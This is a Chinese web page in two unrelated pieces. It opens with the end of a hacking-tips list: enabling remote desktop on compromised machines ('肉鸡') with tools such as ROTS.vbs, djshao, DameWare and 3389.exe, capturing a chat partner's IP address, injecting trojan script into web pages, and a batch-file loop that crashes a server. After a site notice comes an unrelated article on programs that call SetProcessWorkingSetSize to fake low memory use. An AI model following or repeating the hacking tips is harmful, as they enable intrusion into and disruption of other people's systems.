　　在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本，例如：

　　c:>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [/r]

　　如果要对本地使用，IP地址为127.0.0.1或者一个点(用.表示)，用户名和密码都为空(用 ""表示)。

　　(3)djshao正式版5.0

　　解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:winnt    emp下，然后 进入c:winnt    emp目录执行djxyx*.**e解压缩文件，然后再执行解压缩出来的azzd.exe文件，等一会肉鸡 会自动重启!重启后会出现终端服务

　　(4)下载DameWare NT Utilities 3.66.0.0 注册版

　　地址www.netsill.com/dwmrcw36600.zip

　　安装注册完毕后输入对方IP用户名密码，等待出现是否安装的对话框点是。

　　复制启动后出现对方桌面。

　　在对方桌面进入控制面版，点添加或删除程序。进入后点添加/删除windows组件，找到终端服务，点际进入 后在启动终端服务上打上勾。确定自动提示重起，重起后OK

　　(5)大家最常用的 3389.exe 下载地址www.hack6.com 把程序上传到肉鸡运行后重启既可

　　48.QQ上得到别人的IP

　　一般跟别人聊天 如果是对方先对你说话 那么她的IP显示出来的概率就大

　　当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复

　　还可以用天网防火墙选择上UDP数据保检测,即可拦截到对方ip

　　49.挂马js代码document.write('');保存到js页面里 可让所有页面挂马

　　50.让服务器重启

　　写个bat死循环:

　　@echo off

　　:loop1

　　cls

　　start cmd.exe

　　goto loop1

　　保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

前几天因空间问题导致不能访问

天晴在这里表示道歉 目前空间已经恢复正常

我实在不愿意提起这个话题.后来在网上看到几篇文章,深深感觉到,已经有程序员站出来,揭穿这个忽悠了千百万用户的诡计了...
请一味追求低内存软件的用户们注意了:什么才应该是选择软件的主要因素.


以下内容需要你对虚拟内存和内存有所了解，但目的只是告诉大家，这些所谓对内存占用小的软件是最为伤硬盘的!

很多人都用过天气秀、雪狐、曰历秀、桌面秀等等桌面软件。这类软件有个最大的特点就是在任务管理器里看，内存占用N小，比记事本都小，只有几百K。很多人就是冲着这点才用这些软件的。

但是，也许大家不知道，这些软件才是占用资源的大户。
这些软件占用资源为什么这么少呢？
Windows编程里有个方法叫做SetProcessWorkingSetSize，对编程有所了解的可以搜索一下。这个方法能够设定程序所占用的内存数（当然有一个最小值）。

比如你打开一个程序，把它最小化，再看任务管理器，里面占用的内存数就是它所使用的最小值，其他暂时用不到的代码就被放到了虚拟内存里。但是，这样做，是影响性能Windows把最多的内存分配给了前台正在运行的程序。

而天气秀等软件所号称的内存压缩技术，就是调用这个SetProcessWorkingSetSize，把内存中的程序代码放到虚拟内存里，调用一次还不够，因为程序运行内存占用不停变化。所以要设定一个Timer(计时器)，每隔一段时间就调用一次（通常是几毫秒）。

虚拟内存是指硬盘上的一部分空间。也就是说，当这些软件运行时，每隔几毫秒，你的电脑CPU就要强制把内存中的代码放到硬盘上－－往硬盘不停地写。
说实话，这种方式来实现内存占用少（实际上并没有少）很BT。

上面所提到的方法SetProcessWorkingSetSize，是微软提供给程序员的一个方法(或称函数)。
所以在这里，提醒大家：千万不要相信宣传!这些所谓对内存占用小的软件是最占资源最为伤硬盘的!


物理内存和虚拟内存

物理内存,在应用中,自然是顾名思义,物理上,真实的插在板子上的内存是多大就是多大了.看机器配置的时候,看的就是这个物理内存.

如果执行的程序很大或很多,就会导致物理内存消耗殆尽.为了解决这个问题,Windows中运用了虚拟内存技术,即拿出一部分硬盘空间来充当内存使用,当内存占用完时,电脑就会自动调用硬盘来充当内存,以缓解内存的紧张.

一个程序,不可避免地要用到虚拟内存,因为不频繁执行或者已经很久没有执行的代码,没有必要留在物理内存中,只会造成浪费;放在虚拟内存中,等执行这部分代码的时候,再调出来.
Windows 的任务管理器可以帮助我们看到进程的虚拟内存.调出任务管理器,点击菜单“查看”－“选择列”,在出现的窗口中,钩上“虚拟内存大小” 点“确定”,这个时候,进程列表中已经显示各进程的虚拟内存大小

一个程序到底应该使用多少虚拟内存呢?不一定,但是应该以恰到好处的符合虚拟内存原本作用为最好.
下面将揭穿表面看起来调用了大量图片、大量运行库的程序,为什么才“占用”不到 1 MB 的内存的诡计.

原来是 SetProcessWorkingSetSize 函数

MSDN 对该函数的表述(翻译):使用这个函数来设置应用程序最小和最大的运行空间,只会保留需要的内存.当应用程序被闲置或系统内存太低时,操作系统会自动调用这个机制来设置应用程序的内存.应用程序也可以使用 VirtualLock 来锁住一定范围的内存不被系统释放;当你加大运行空间给应用程序,你能够得到的物理内存取决于系统,这会造成其他应用程序降低性能或系统总体降低性能,这也可能导致请求物理内存的操作失败,例如:建立 进程,线程,内核池,就必须小心的使用该函数.

也就是说,该函数不是节省内存,而是强制把进程的物理内存搬到虚拟内存中.

另外有一些资料上说,该函数“将有可能导致缺页中断,严重影响性能”.
函数原型:
BOOL SetProcessWorkingSetSize(
HANDLE hProcess,
SIZE_T dwMinimumWorkingSetSize,
SIZE_T dwMaximumWorkingSetSize
);

我们用 VB 来做这么一个简单的例子,是程序占用 300 KB 内存吧.

建立一个标准的 VB 工程,在 Form1 中放置一个 Timer1 ,把 Interval 属性设置为 1000 (即 1 秒).然后在代码编辑框中输入以下代码:

Private Declare Function SetProcessWorkingSetSize Lib "kernel32" (ByVal hProcess As Long, ByVal dwMinimumWorkingSetSize As Long, ByVal dwMaximumWorkingSetSize As Long) As Long
Private Declare Function GetCurrentProcess Lib "kernel32" () As Long

Private Sub Timer1_Timer()
SetProcessWorkingSetSize GetCurrentProcess(), 50000, 100000
End Sub

然后生成 工程1.exe,执行,调出任务管理器查看,发现内存占用才 320 KB.如果把定时器关闭,这进程的内存一般 4 MB左右.
必须定时执行该函数,否则虚拟内存会慢慢被调出来,恢复原来的内存大小.
如果要使一个本来需要占用大量内存的程序减低到几百 KB ,使用同样的方法即可.

诡计带来的危害

如果 SetProcessWorkingSetSize 函数被正常使用,是非常有用处的.但是为了蒙骗用户的眼睛,每秒,甚至几十毫秒就把大量内存往虚拟内存里面压,就会带来无可预计的危害.看看这篇文章怎么说:“因为他只是暂时的将应用程序占用的内存移至虚拟内存,一旦,应用程序被激活或者有操作请求时,这些内存又会被重新占用.如果你强制使用该方法来设置程序占用的内存,那么可能在一定程度上反而会降低系统性能,因为系统需要频繁的进行内存和硬盘间的页面交换.”.

没错,如果你使用了这类软件,意味着你的硬盘将每秒将 I/O 大量数据;硬盘的磁针将拼命旋转...(当然硬盘磁针不可能不旋转^_^,只是选择得更厉害而已).

不是说 BT 很伤内存吗?不然,因为现在大多 BT 软件都有缓存技术.且看 Bitcomet 官方对缓存技术的说明:“传统BT高速下载时硬盘会响得很厉害,这是大量的随机读取造成的.... BitComet可以由用户设置缓存大小.... 可以明显地看出牺牲一小部分内存作缓存对硬盘的保护作用.”

是不是有种心寒的感觉?一类软件宁愿牺牲内存,也要减少保护硬盘;而另外一类软件,却为了欺骗用户,让CPU、硬盘更加奔波......

抓一个凶手

这类软件不少,我以其中一个桌面工具为例,揭穿它的假面具(不点名字了).运行该软件后,随意操作一下,然后打开进程管理器,把虚拟内存列调出来,找到该进程

OK,20 MB 虚拟内存,而只有 632 KB 物理内存.细心的你会发现,大概每 1 秒,该行都有闪烁的感觉,没错,这正是每秒调用 SetProcessWorkingSetSize 的结果.另外,我们打开 Norton Process Viewer ,查看该进程的 CPU 占用情况

可以看到,就算没有操作该软件,但是每秒,都有 3% 的CPU占用起伏(虽然这并不能说明什么).另外,内存框中可以看到物理内存和虚拟内存的占用,两者相去甚远.此外,可以用 Hook API 技术来证明每秒调用 SetProcessWorkingSetSize 的行为.

应该怎么做

这篇文章只想让用户了解软件占用资源的实际.而程序员应该把下功夫,真正从代码中减少内存的消耗,而不是一味忽悠用户.调用 SetProcessWorkingSetSize 会带来某些好处,但是何时调用、如何调用应该符合两个要求:
1,在程序暂时不被使用的时候(例如最小化);
2,物理内存和虚拟内存应处于一个合适的比例(而不是 600 KB 比 20 MB 这么荒唐);
3,或者不调用,让 Windows 去处理.
(本人技术有限,对于文中的错误恳请高手给予指正)